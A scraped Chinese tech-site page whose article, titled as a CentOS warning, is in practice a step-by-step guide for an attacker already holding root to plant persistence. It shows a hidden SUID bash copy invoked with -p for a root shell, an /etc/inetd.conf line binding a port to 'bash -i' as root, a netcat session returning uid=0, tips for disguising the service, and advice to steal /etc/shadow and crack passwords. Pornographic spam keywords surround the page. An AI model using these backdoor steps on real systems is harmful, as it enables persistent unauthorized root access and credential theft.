国产片侵犯亲女视频播放_亚洲精品二区_在线免费国产视频_欧美精品一区二区三区在线_少妇久久久_在线观看av不卡

服務(wù)器之家:專注于服務(wù)器技術(shù)及軟件下載分享
分類導(dǎo)航

Linux|Centos|Ubuntu|系統(tǒng)進(jìn)程|Fedora|注冊(cè)表|Bios|Solaris|Windows7|Windows10|Windows11|windows server|

服務(wù)器之家 - 服務(wù)器系統(tǒng) - Centos - CentOS小心被suid shell與inetd后門利用的詳細(xì)講解

CentOS小心被suid shell與inetd后門利用的詳細(xì)講解

2019-06-27 14:00CentOS之家 Centos

今天小編為大家?guī)?lái)的是CentOS小心被suid shell與inetd后門利用的詳細(xì)講解;希望對(duì)大家會(huì)有幫助,有需要的朋友一起去看看吧

你現(xiàn)在已經(jīng)是root用戶,想留一個(gè)后門。

CentOS小心被suid shell與inetd后門利用的詳細(xì)講解

系統(tǒng)環(huán)境:

dawg:~#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

1.SUIDshell

首先,先切換成為root用戶,并執(zhí)行以下的命令:

dawg:~#cp/bin/bash/.wootdawg:~#chmod4755/.wootdawg:~#ls-al/.woot-rwsr-xr-x1rootroot690668Jul2417:14/.woot

當(dāng)然,你也可以起其他更具備隱藏性的名字,我想猥瑣并機(jī)智的你,肯定能想出很多好的名字的。文件前面的那一點(diǎn)也不是必要的,只是為了隱藏文件(在文件名的最前面加上“.”,就可以在任意文件目錄下進(jìn)行隱藏).

現(xiàn)在,做為一個(gè)普通用戶,我們來(lái)啟用這個(gè)后門:

fw@dawg:~$iduid=1000(fw)gid=1000(fw)groups=1000(fw)fw@dawg:~$/.woot.woot-2.05b$iduid=1000(fw)gid=1000(fw)groups=1000(fw).woot-2.05b$

為什么不行呢?

因?yàn)閎ash2針對(duì)suid有一些護(hù)衛(wèi)的措施.但這也不是不可破的:

.woot-2.05b$/.woot-p

.woot-2.05b#id

uid=1000(fw)gid=1000(fw)euid=0(root)groups=1000(fw)

使用-p參數(shù)來(lái)獲取一個(gè)rootshell.這個(gè)euid的意思是effectiveuserid(關(guān)于這些ID的知識(shí),可以戳這里)

這里要特別注意的是,作為一個(gè)普通用戶執(zhí)行這個(gè)SUIDshell時(shí),一定要使用全路徑。

小知識(shí):

如何查找那些具有SUID的文件:

dawg:~#find/-perm+4000-ls

這時(shí)就會(huì)返回具有SUID位的文件啦。

2.遠(yuǎn)程后門:利用/etc/inetd.conf

我們使用vi來(lái)修改/etc/inetd.conf文件

原文件:

#chargendgramudpwaitrootinternal

#discardstreamtcpnowaitrootinternal

#discarddgramudpwaitrootinternal

#daytimestreamtcpnowaitrootinternal

修改為:

#discardstreamtcpnowaitrootinternal

#discarddgramudpwaitrootinternal

daytimestreamtcpnowaitroot/bin/bashbash-i

開啟inetd:

dawg:~#inetd

如果要強(qiáng)制重啟inetd:

dawg:~#ps-ef|grepinetdroot36210Jul22?00:00:00/usr/sbin/inetdroot1376913643017:51pts/100:00:00grepinetddawg:~#kill-HUP362

現(xiàn)在我們就可以用nc來(lái)爆菊了:

C:tools192.168.1.77:inversehostlookupfailed:h_errno11004:NO_DATA

(UNKNOWN)[192.168.1.77]13(daytime)open

bash:nojobcontrolinthisshell

bash-2.05b#bash-2.05b#

bash-2.05b#iduid=0(root)

gid=0(root)groups=0(root)bash-2.05b#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

小貼士:

我們可以修改/etc/services文件,加入以下的東西:

woot6666/tcp#evilbackdoorservice

然后修改/etc/inetd.conf:

wootstreamtcpnowaitroot/bin/bashbash-i

我們可以修改成一些常見的端口,以實(shí)現(xiàn)隱藏。

小編感言:其實(shí)下/etc/shadow文件,爆破root的密碼才最保險(xiǎn)啊!

延伸 · 閱讀

精彩推薦
  • CentosCentOS下Uptime命令詳解

    CentOS下Uptime命令詳解

    在Linux下,我們可以使用uptime命令,而且此命令不必使用root權(quán)限。uptime命令在系統(tǒng)中已經(jīng)默認(rèn)安裝了。今天小編為大家?guī)?lái)的是CentOS下Uptime命令詳解;希望...

    CentOS之家11482019-06-19
  • CentosCentos 7開啟網(wǎng)卡自動(dòng)獲取IP的詳細(xì)方法

    Centos 7開啟網(wǎng)卡自動(dòng)獲取IP的詳細(xì)方法

    本篇文章主要介紹了Centos 7開啟網(wǎng)卡自動(dòng)獲取IP的詳細(xì)方法,小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨小編過來(lái)看看吧...

    凌鋒8972021-12-29
  • CentosCentOS 6.6實(shí)現(xiàn)永久修改DNS地址的方法

    CentOS 6.6實(shí)現(xiàn)永久修改DNS地址的方法

    這篇文章主要介紹了CentOS 6.6實(shí)現(xiàn)永久修改DNS地址的方法,涉及針對(duì)CentOS配置文件的相關(guān)設(shè)置技巧,具有一定參考借鑒價(jià)值,需要的朋友可以參考下 ...

    Linux社區(qū)4472020-08-21
  • CentosCentOS7設(shè)置日期和時(shí)間方法以及基本概念介紹

    CentOS7設(shè)置日期和時(shí)間方法以及基本概念介紹

    這篇文章主要介紹了CentOS7設(shè)置日期和時(shí)間方法以及基本概念介紹,本文講解使用CentOS7中的新命令timedatectl設(shè)置日期時(shí)間方法,需要的朋友可以參考下 ...

    CentOS之家6522019-09-19
  • CentosCentOS6.5下Redis安裝與配置詳細(xì)步驟

    CentOS6.5下Redis安裝與配置詳細(xì)步驟

    本篇文章主要介紹了CentOS6.5下Redis安裝與配置詳細(xì)步驟,詳細(xì)介紹redis單機(jī)單實(shí)例安裝與配置,服務(wù)及開機(jī)自啟動(dòng)。有興趣的可以了解一下。...

    飛流11452021-12-24
  • CentosCentos7運(yùn)用/dev/shm進(jìn)行網(wǎng)站優(yōu)化

    Centos7運(yùn)用/dev/shm進(jìn)行網(wǎng)站優(yōu)化

    這篇文章主要介紹了LINUX中Centos7運(yùn)用/dev/shm進(jìn)行網(wǎng)站優(yōu)化相關(guān)知識(shí)點(diǎn),對(duì)此有興趣的朋友參考學(xué)習(xí)下。...

    彬菌9912022-03-02
  • Centoscentos 安裝與操作方法

    centos 安裝與操作方法

    這篇文章主要介紹了centos 安裝與操作方法,需要的朋友可以參考下...

    centos之家5272019-07-11
  • Centoscentos不小心刪除/root目錄該如何解決?

    centos不小心刪除/root目錄該如何解決?

    一些朋友最近在問小編centos不小心刪除/root目錄該如何解決?今天小編就為大家分享centos不小心刪除/root目錄解決辦法;希望對(duì)大家會(huì)有幫助,有需要的朋友...

    腳本之家8022019-05-29
Weibo Article 1 Weibo Article 2 Weibo Article 3 Weibo Article 4 Weibo Article 5 Weibo Article 6 Weibo Article 7 Weibo Article 8 Weibo Article 9 Weibo Article 10 Weibo Article 11 Weibo Article 12 Weibo Article 13 Weibo Article 14 Weibo Article 15 Weibo Article 16 Weibo Article 17 Weibo Article 18 Weibo Article 19 Weibo Article 20 Weibo Article 21 Weibo Article 22 Weibo Article 23 Weibo Article 24 Weibo Article 25 Weibo Article 26 Weibo Article 27 Weibo Article 28 Weibo Article 29 Weibo Article 30 Weibo Article 31 Weibo Article 32 Weibo Article 33 Weibo Article 34 Weibo Article 35 Weibo Article 36 Weibo Article 37 Weibo Article 38 Weibo Article 39 Weibo Article 40
主站蜘蛛池模板: 99热激情 | 免费成人高清在线视频 | 亚洲一区二区三区四区的 | 在线观看免费成人av | 性色网站 | 欧美日韩综合一区 | 性爽视频| 综合久久亚洲 | 日韩精品电影 | 久久精品国产精品青草 | 中文字幕av在线播放 | 你懂的免费在线观看 | 国产成人精品一区二区三区网站观看 | 在线观看亚洲精品 | 久久久精品亚洲 | 亚洲国产精品久久人人爱 | 亚洲欧美激情在线 | 国产精品亚洲自拍 | 欧美日韩国产高清 | 国产激情偷乱视频一区二区三区 | 最新天堂中文在线 | 国产欧美视频在线 | 午夜影视| 人人澡人人射 | 亚洲午夜激情 | 91夜夜操 | 中国大陆高清aⅴ毛片 | 久久久99久久 | 免费观看视频毛片 | 日韩精品一区二区三区中文字幕 | 精品免费久久久久 | 一本色道久久综合狠狠躁篇怎么玩 | 成人乱码一区二区三区av | 亚洲成人av在线 | 秋霞电影院午夜伦 | 国产精品毛片久久久久久久 | 久久国产精品久久久久久电车 | 久久久精品 | 欧美日韩免费视频 | 国产成人在线看 | 青青久草在线 |